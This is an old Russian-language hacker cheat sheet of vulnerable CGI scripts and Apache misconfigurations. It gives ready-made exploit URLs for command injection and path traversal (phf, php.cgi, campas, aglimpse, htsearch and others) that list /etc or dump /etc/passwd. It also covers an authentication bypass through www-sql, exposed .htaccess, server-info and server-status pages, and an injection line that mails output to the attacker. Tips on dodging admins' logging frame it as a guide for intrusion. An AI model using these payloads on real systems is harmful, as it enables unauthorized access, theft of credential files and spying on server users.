handler, handler.cgi
Возможность исполнения команд.
Использование:
/cgi-bin/handler/useless_shit;ls%20-lFa%20/etc|?data=Download
Обычно данный скрипт идет с webdist.cgi, который так же имеет уязвимость.
webdist.cgi
Возможность исполнения команд.
Использование:
/cgi-bin/webdist.cgi?distloc=;ls%20-lFa%20/etc/
campas
Возможность исполнения команд.
Использование:
/cgi-bin/campas?%0als%20-lFa%20/etc
info2www
Возможность исполнения команд.
Использование:
/cgi-bin/info2www?`(../../../../../../../../ls%20-lFa%20/etc|)`
pfdisplay.cgi
Возможность исполнения команд.
Использование:
/cgi-bin/pfdisplay.cgi?'%0Als%20-lFa%20/etc/'
php, php.cgi, php-cgi
Возможность просмотра файлов.
Использование:
/cgi-bin/php.cgi?/etc/passwd
Очень старая и глупая дырка, 98% пропатчено.
phf, phf.cgi, phf.pp
Возможность исполнения команд.
Использование:
/cgi-bin/phf?Qname=root%0A/bin/cat%20/etc/passwd
Дырка 96 года, но до сих пор кое, где работает. Будьте осторожны т.к. некоторые
админы специально оставляют данный скрипт, и ведут нехороший лог на всех тех,
кто пытаются юзать данный скрипт не по назначению.
htmlscript
Возможность просмотра файлов.
Использование:
/cgi-bin/htmlscript?../../../../etc/passwd
Иногда это не прокатывает, так как некоторые админы тоже не лам0ры :). Еще
иногда админы их переименовывают. Также поэкспериментируйте с /../ .
htsearch
Возможность просмотра файлов.
Использование:
/htsearch?exclude=%60/etc/passwd%60
100% работает на версии 3.0, после того как ввели данный линк, гляньте в HTML
source, в нем должно быть содержимое файла.
viewsource
Возможность просмотра файлов.
Использование:
/cgi-bin/view-source?../../../../../../../../etc/passwd
Аналогично htmlscript. Если не получается, поэкспериментируйте с /../ .
aglimpse
Возможность исполнения команд.
Использование:
/cgi-bin/aglimpse/80|IFS=X;CMD=lsX-lFaX/etc/;eval$CMD;echo
Все дело также можно провернуть зателнетившись на 80 порт.
faxsurvey
Возможность исполнения команд.
Использование:
/cgi-bin/faxsurvey?/bin/ls%20-la%20/etc/
Ultimate.cgi
Возможность исполнения команд.
Использование:
Данный скрипт является форумом. Достатосно найти replay страницу, и сохранить
её на диске. После этого найти в source странице: Команды можно ставить любые,
потом "replay", и скоренько проверять мыло :).
commander.pl
Возможность исполнения команд.
Использование:
Данный скрипт дает вам возможность выполнять команды прямо из браузера. Просто
идите по ссылке на скрипт и сами все поймете :).
.htaccess
Содержит важную информацию.
Использование:
Если админ использует разграничение доступа к файлам/директориям с помощью
.htaccess, то вполне реально просмотреть этот самый .htaccess через броузер.
Для примера: если мишенью является запрещенная директория /usr/local/etc/httpd/docs/secure
использующая .htaccess-файл для контроля доступа Этот урл должен показать его
http://www.server.com/secure/.htaccess (NCSA,Apache)
http://www.server.com/secure/.wwwacl (CERN)
Кроме того что он может содержать интересную инфу,в нем может быть указан путь
к файлу с паролями. Также иногда .htaccess может включать зашифрованные пароли
в формате
login:*#^$#^@$^@#$@#$
www-sql
Возможность просмотра файлов.
Использование:
Это небольшой скрипт, который используется для доступа к базам данных mysql
via Web. Все бы ничего но с помощью этого скрипта можно провернуть одну вещь,такую
же как и с php.cgi и w3-msql(w3-sql). Проблема в том что www-sql не выполняет
проверки-имеет ли пользователь доступ к тем или иным файлам.
Допустим следующее:
- информация находится в /home/htdocs/
- имеется поддиректория /home/htdocs/protected/ в которой
- имеется разграничение доступа с помощью файла .htaccess.
Итак, пробуем URL:
http://server.com/protected/something.html
ага, требуют username и password.Теперь введем URL:
http://server.com/cgi-bin/www-sql/protected/something.html
и получаем запрошенный файл без всяких проблем. ;)
survey.cgi
Возможность исполнения команд.
Использование:
Скрипт занимается голосованием.
Как я понял этот скрипт имеет два состояния-первый -люди могут голосовать столько
сколько хотят, а другой-это люди могут голосовать по-разу в час. Дыра действует
только в том случае если включен второй mode. Итак, желательно посмотреть фориу
в хтмл-что видим? видим
input type=hidden name=filebase,
теперь сохраняем форму у себя и пытаемся использовать =filebase, пытаемся команды
использовать и так далее ;) У Duke написано
bleh; /bin/mail you@your_email_address.com
ну что ж.... попробуй вставить что-нибудь свое.
server-info
Содержит важную информацию.
Использование:
Это работает только на апаче. путь- www.apache.ru/server-info (это пример).
Позволяет просматривать конфигурацию апача. Что к какому модулю обращается
и так далеею. Как правило доступ к нему запрещен, но иногда нерадивые админы
забывают об этом.
server-status
Содержит важную информацию.
Использование:
Это работает только на апаче. Когда я в первый увидел это на одном серваке,
то меня это очень приятно удивило. Никаких паролей правда там нет, но информация
весьма и весьма интересная. Больше всего меня поразило то, что server-status
показывал кто и к какому ресурсу обращается в даный момент. Это был сервак
хостера, и поэтому я смотрел, с какого ip просматривают в данный момент www.porno.com
:) (Это пример)
Еще server-status можно вызывать с различными параметрами, чтобы refresh был
посекундный и так далее.